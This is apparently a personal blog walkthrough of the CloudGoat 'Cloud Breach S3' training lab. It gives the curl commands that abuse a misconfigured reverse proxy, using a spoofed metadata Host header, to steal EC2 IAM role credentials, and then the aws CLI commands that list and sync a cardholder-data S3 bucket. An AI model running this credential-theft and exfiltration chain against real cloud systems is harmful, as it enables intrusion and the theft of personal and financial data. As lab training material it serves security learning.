CloudGoat: Cloud Breach S3

March 17, 2024 less than 1 minute read

We did not get any users in this scenario, but we knew the IP Address of EC2 instance which is a misconfigured reversed proxy server. We will take credentials from the instance role, and use this credentials to exfiltrate data from S3.

Get Role from EC2

curl -s http://<ec2-ip-address>/latest/meta-data/iam/security-credentials/ -H 'Host:169.254.169.254'

Result:

cg-banking-WAF-Role-cloud_breach_s3_###

We got the role for this instance

Get role credentials

curl -s http://<ec2-ip-address>/latest/meta-data/iam/security-credentials/cg-banking-WAF-Role-cloud_breach_s3_### -H 'Host:169.254.169.254'

Result:

{
  "AccessKeyId" : "<access-key-id>",
  "SecretAccessKey" : "<secret-access-key",
  "Token" : "<session-token"
}

To create AWS cli profile, see here

In this blog, I will use cg-banking as an assumed role.

List S3 buckets

aws --profile cg-banking s3 ls

Result:

2024-03-17 16:03:00 cg-cardholder-data-bucket-cloud-breach-s3-###

Get PII data

To download all data from S3 to our local computer, we will sync our local folder with S3 bucket

aws --profile cg-banking s3 sync s3://cg-cardholder-data-bucket-cloud-breach-s3-### ./cardholder-data

See all files in folder

ls cardholder-data

Result:

cardholder_data_primary.csv   cardholders_corporate.csv
cardholder_data_secondary.csv goat.png

🎇 All cardholder data are in our hands.

Chayutpong Promya

Get Role from EC2

Get role credentials

List S3 buckets

Get PII data